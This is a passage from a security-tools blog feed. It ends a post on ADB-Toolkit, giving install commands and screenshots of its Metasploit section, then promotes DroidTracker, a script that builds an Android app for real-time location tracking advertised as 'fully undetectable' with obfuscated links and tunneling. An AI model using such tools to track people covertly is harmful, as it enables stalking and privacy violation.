sudo ./install.sh -i
# or
sudo bash install.sh -i</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>Usage</b></span><br />
<div>
<pre><code>sudo ./ADB-Toolkit.sh
# or
sudo bash ADB-Toolkit.sh
# or, from anywhere in the shell
sudo adb-toolkit</code></pre>
</div>
<br />
<span style="font-size: x-large;"><b>ADB-Toolkit Screenshot</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s1600/ADB-Toolkit_7_git1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="861" data-original-width="849" height="640" src="https://1.bp.blogspot.com/-ZhDQhHwsaOA/Xwu5ZG8t3MI/AAAAAAAATIU/n_9vtY394s0IvlEGvpBotNlxsqZ-whLeQCNcBGAsYHQ/s640/ADB-Toolkit_7_git1.jpeg" width="631" /></a></div>
<br />
<span style="font-size: x-large;"><b>Metasploit Section Screenshot</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-pfs7BeANEB0/Xwu5puyKTaI/AAAAAAAATIg/D6-gZsb4vTk37w6eLQUvwdZr2m9buWubACNcBGAsYHQ/s1600/ADB-Toolkit_8_git2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="662" data-original-width="777" height="544" src="https://1.bp.blogspot.com/-pfs7BeANEB0/Xwu5puyKTaI/AAAAAAAATIg/D6-gZsb4vTk37w6eLQUvwdZr2m9buWubACNcBGAsYHQ/s640/ADB-Toolkit_8_git2.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-r-REMY_KrQw/Xwu5pYkBUBI/AAAAAAAATIY/EMlswJZ3fvIMAx8KEPw9kH9f2aC8Cj3wwCNcBGAsYHQ/s1600/ADB-Toolkit_9_git3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="469" data-original-width="886" height="338" src="https://1.bp.blogspot.com/-r-REMY_KrQw/Xwu5pYkBUBI/AAAAAAAATIY/EMlswJZ3fvIMAx8KEPw9kH9f2aC8Cj3wwCNcBGAsYHQ/s640/ADB-Toolkit_9_git3.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-PRatO2XhPmI/Xwu5pibBKOI/AAAAAAAATIc/jvs276crOl0aHFCN-2KRxHbgqCLnLtGwACNcBGAsYHQ/s1600/ADB-Toolkit_10_git4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="890" height="306" src="https://1.bp.blogspot.com/-PRatO2XhPmI/Xwu5pibBKOI/AAAAAAAATIc/jvs276crOl0aHFCN-2KRxHbgqCLnLtGwACNcBGAsYHQ/s640/ADB-Toolkit_10_git4.jpeg" width="640" /></a></div>
<br />
<span style="font-size: x-large;"><b>Contributing</b></span><br />
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.<br />
<br />
<span style="font-size: x-large;"><b>Author</b></span><br />
<ul>
<li><strong>ASHWINI SAHU</strong> - <em>WHOLE WORK</em> - (<a href="https://github.com/ASHWIN990" rel="nofollow" target="_blank" title="https://github.com/ASHWIN990">https://github.com/ASHWIN990</a>)</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ASHWIN990/ADB-Toolkit" rel="nofollow" target="_blank" title="Download ADB-Toolkit">Download ADB-Toolkit</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19121531973713787942020-06-20T17:30:00.000-04:002020-06-20T17:30:13.906-04:00DroidTracker - Script To Generate An Android App To Track Location In Real Time<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9uVj8129BG4/Xt8bhf6QPqI/AAAAAAAASyo/ko4fxhnnr18oDHkUHaN-pGjqyKdVpozHQCNcBGAsYHQ/s1600/DroidTracker_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="760" data-original-width="688" height="640" src="https://1.bp.blogspot.com/-9uVj8129BG4/Xt8bhf6QPqI/AAAAAAAASyo/ko4fxhnnr18oDHkUHaN-pGjqyKdVpozHQCNcBGAsYHQ/s640/DroidTracker_1.png" width="579" /></a></div>
<br />
Script to generate an <a href="https://www.kitploit.com/search/label/Android%20App" target="_blank" title="Android App">Android App</a> to track location in real time<br />
<br />
<b>Features:</b><br />
<ul>
<li>Custom App Name</li>
<li>2 <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="Port Forwarding">Port Forwarding</a> options (Ngrok or using SSH <a href="https://www.kitploit.com/search/label/Tunneling" target="_blank" title="Tunneling">Tunneling</a> with Serveo.net)</li>
<li>Obfuscated URL by Tinyurl</li>
<li>Fully Undetectable</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Legal disclaimer:</b></span><br />
Usage of DroidTracker for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.<br />
<br />
<b>Auto Install:</b><br />
<pre><code># bash install.sh</code></pre>
<br />
<b>Installing on <a href="https://www.kitploit.com/search/label/Kali" target="_blank" title="Kali">Kali</a> Linux:</b><br />
<pre><code>Install dependencies:
# apt-get update
# apt-get install default-jdk apksigner
For x86:
# apt-get install libc6-dev-i386 lib32z1
For AMD64:
# apt-get install lib32z1 lib32ncurses6 lib32stdc++6
Download SDK-Tools:
# wget https://dl.google.com/android/repository/sdk-tools-linux-4333796.zip
# mkdir -p $HOME/Android/Sdk
# unzip sdk-tools-linux* -d $HOME/Android/Sdk
Install SDKMAN:
# curl -s "https://get.sdkman.io" | bash
# source "$HOME/.sdkman/bin/sdkman-init.sh"
# echo "Y" | sdk install java 8.0.191-oracle
# sdk use java 8.0.191-oracle
# sdk install gradle 2.14.1
# sdk use gradle 2.14.1
# echo "y" | $HOME/Android/Sdk/tools/bin/sdkmanager "platforms;android-25" "build-tools;25.0.1" "extras;google;m2repository" "extras;android;m2repository"
Clone and run:
# git clone https://github.com/thelinuxchoice/droidtracker
# cd droidtracker
# bash droidtracker.sh</code></pre>
<br />
<span style="font-size: small;"><b>Author: <a href="https://github.com/thelinuxchoice/DroidTracker" rel="nofollow" target="_blank" title="https://github.com/thelinuxchoice/DroidTracker">https://github.com/thelinuxchoice/DroidTracker</a></b></span><br />
<span style="font-size: small;"><b>IG: <a href="https://www.instagram.com/linux_choice" rel="nofollow" target="_blank" title="https://www.instagram.com/linux_choice">https://www.instagram.com/linux_choice</a></b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/thelinuxchoice/DroidTracker" rel="nofollow" target="_blank" title="Download DroidTracker">Download DroidTracker</a></span></b></div>
Unknownnoreply@blogger.com